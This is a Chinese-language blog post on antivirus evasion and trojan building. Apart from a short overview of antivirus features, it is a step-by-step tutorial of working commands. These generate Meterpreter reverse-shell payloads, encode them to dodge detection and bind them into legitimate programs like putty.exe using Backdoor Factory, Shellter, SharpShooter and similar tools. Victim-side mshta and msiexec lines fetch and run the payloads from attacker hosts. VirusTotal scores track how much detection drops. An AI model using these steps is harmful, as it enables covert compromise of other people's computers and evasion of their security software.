免杀技术以及木马处理


免杀技术以及木马处理

如果需要深入了解

需要学习:破解、二进制、逆向工程

杀毒软件原理:

扫描技术

扫描压缩包,对压缩包内容进行分析检查

程序篡改防护

避免感染文件

修复技术

对受损文件进行还原

急救盘杀毒

利用空白的u盘制作进行杀毒

智能扫描

扫描常用磁盘和系统关键位置

全盘扫描

所有地方都扫描

勒索软件防护

保护电脑文件不被加密

开机扫描

扫描坑不需要的程序

监控技术

内存监控:

监控内存,进程,网络数据

文件监控:

发现文件存在病毒或者被感染报警

邮件监控:

电子邮件病毒拦截

网页防护

阻止网络攻击和不安全的下载

行为防护

提醒用户应用程序可疑的行为

安装wine32

dpkg --add-architecture i386 && apt update && apt -y install wine32 

linux支持exe程序

安装pip

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py 

python2 get-pip.py 

apt-get install python3-pip 

pip install --upgrade pip -i https://pypi.douban.com/simple 

python应用商店

生成一个普通木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=[ip] lport=[端口] -f exe -o shell.exe
# -p windows/meterpreter/reverse_tcp 利用windows/meterpreter/reverse_tcp 生成木马程序
# lhost=[ip] lport=[端口] 连接本地ip和端口
# -o shell.exe 生成名为shell.exe的木马程序
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost=192.168.3.134
show options
exploit

background
sessions

http://virustotal.com

56/71

msf自带免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o shell.exe

# x86/shikata_ga_nai 用自带免杀把软件进行加密
# 屏蔽\x00 i加密15次
# -f exe 加密同时不能破坏exe的结构

55/71

msf捆绑免杀

比如:一个正经软件+捆绑木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -x putty.exe -f exe -o shell.exe

# -x putty.exe 把木马程序捆绑在putty.exe上
# -f exe 加密同时不能破坏exe的结构

44/71

msf自带免杀+捆绑

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o shell.exe

# 合并前两个操作

45/70

backdoor factory

后门工厂

在github搜索backdoor factory
下载下来之后进入文件夹
cd the-backdoor-factory-master/
chmod 777 ./*
./install.sh
pip install -i https://pypi.douban.com/simple pefile/capstone
# 重新安装缺失组件

对某个正经程序插入木马代码:
# 查看这个程序是否支持插入代码
python backdoor.py -f /root/putty.exe -S

# 查找程序里大于600的缝隙
python backdoor.py -f /root/putty.exe -c -l 600

# 获取文件可用的payload
python backdoor.py -f /root/putty.exe -s show

# 生成payload
python backdoor.py -f /root/putty.exe -s reverse_shell_tcp_inline -H 192.168.1.144 -P 4444 -J -o haha.exe

用户自己做的木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -f raw -o shell.c

python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shell.c -o haha.exe

# 把木马做成.c的格式

48/71

unicorn独角兽

cd unicorn-master/
ls
chmod 777 ./*
python unicorn.py --help

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.144 4444

# 生成2个文件,xxx.rc文件[meterpreter监听代码]和txt文件[powershell的txt文件攻击代码](powershell的txt文件可以考虑变成bat)

msfconsole -r unicorn.rc
msfconsole -r xxx.rc
# 使用代码

6/59

spookflare

GitHub上搜索

cd  SpookFlare-master/
ls
chmod 777 ./*
# 发现有requirements.txt就要去安装Python的依赖库

安装python依赖库
pip install -i https://pypi.douban.com/simple -r requirements.txt

python  spookflare.py     # 进入

help

list
use 2
info    #可以查看需要set的内容【类似于options】
set PROTO http
set LHOST 192.168.1.144
set LPORT 8080
set ARCH x64
set SSIZE 61337
(ps:注意大小写敏感)
generate    #生成

此时生成了三个文件

image-20220322113335216

把上面那个cs后缀的文件改名为test.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319

csc.exe /t:exe /out:test.exe test.cs  //把上面那个cs后缀的文件改名为test.cs

sharpshooter

cd   SharpShooter-master/
ls
chmod 777 ./*
# 发现有requirements.txt就要去安装Python的依赖库

# 安装python依赖库
pip install -i https://pypi.douban.com/simple -r requirements.txt

# 生成txt格式木马
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.144 LPORT=4444 -f raw -o shellcode.txt

# 创建ht  a后门
python SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./shellcode.txt --sandbox 4 --smuggle --template mcafee

# 得到hta格式和html格式

use  multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.144
set lport 4444
exploit

被植入电脑cmd:执行
mshta.exe http://192.168.1.252/foo.hta
http://192.168.1.252/foo.html

类似钓鱼网站执行

24/61

msf创建hta程序

msfconsole
use exploit/windows/misc/hta_server
set srvhost [你自己ip]
set lhost [你自己ip]
exploit

# 会给你一个网址 http://xxxxxx/xxx.hta

#然后用户可以远程去执行:
mshta http://xxxxxx/xxx.hta

29/61

shellter

apt-get install shellter  # 安装一下,不能在终端操作
shellter
A
PE Target: /root/putty.exe

image-20220322145051728

image-20220322145118755

image-20220322145226624

image-20220322145536428

Eable Stealth Mode可以no,不然效果会差一点

39/70

生成之后在msfconsole里使用:

handler -H 192.168.1.144 -P 4444 -p windows/meterpreter/reverse_tcp

jobs
可以看见开启监听

msi执行的木马——可以隔空执行的

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -f msi > haha.txt

然后在被控制电脑里:
msiexec /q /i http://192.168.1.252/haha.txt

35/58

shellcode-launcher

github

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -f raw -o shell.raw

需要shellcode-launcher执行

shellcode_launcher.exe -i shell.raw

24/59

免杀在实战中很重要,不过最好得学会编程,不然没办法自己研发出自己的木马,用人家的东西效果一般不太友好。


文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录